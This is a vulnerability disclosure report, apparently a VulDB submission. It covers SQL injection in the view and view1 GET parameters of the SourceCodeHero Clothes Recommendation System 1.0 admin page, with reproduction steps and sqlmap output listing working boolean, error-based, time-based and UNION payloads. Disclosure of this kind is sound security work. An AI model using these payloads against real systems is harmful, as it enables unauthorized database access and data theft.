Title | SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection |
---|
Description | I would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing.
Details:
Affected URL/Endpoint: /Online_Shopping/admin/home.php?view=1%20&%20view1=1
Vulnerable Parameter: 'view', 'view1'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Login as admin via /online_shopping/admin
2) Navigate to 'View All'
3) select a category and sub category
4) Use a proxy like burpsuite to intercept the request.
5) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
sqlmap resumed the following injection point(s) from stored session:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: view (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: view=1 ' AND 8219=8219-- amBF& view1=1
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: view=1 ' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(6428=6428,1))),0x71706a7a71),6428)-- CRgU& view1=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: view=1 ' AND (SELECT 9251 FROM (SELECT(SLEEP(5)))rdxA)-- kmmr& view1=1
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: view=1 ' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x6c476679526269716b6748556857525a67567a7a5178737575795974584f7454694e62525859614b,0x71706a7a71),NULL,NULL-- -& view1=1
Parameter: view1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: view=1 & view1=1' AND 8519=8519-- GRrq
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: view=1 & view1=1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(5545=5545,1))),0x71706a7a71),5545)-- MWyB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: view=1 & view1=1' AND (SELECT 1310 FROM (SELECT(SLEEP(5)))lIMf)-- cZqd
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: view=1 & view1=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x4f6870744a4650484f446d4a45636d7162694b54765874704a767975656d6f4945415a5264674878,0x71706a7a71)-- -
---
[13:39:49] [INFO] the back-end DBMS is MySQL
[13:39:49] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.6
banner: '8.3.0'
Please let me know if you need further information or a more detailed analysis. |
---|
User | Delvy (UID 74555) |
---|
Submission | 10/21/2024 07:40 AM (2 months ago) |
---|
Moderation | 10/24/2024 12:48 PM (3 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 281683 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php view/view1 sql injection] |
---|
Points | 17 |
---|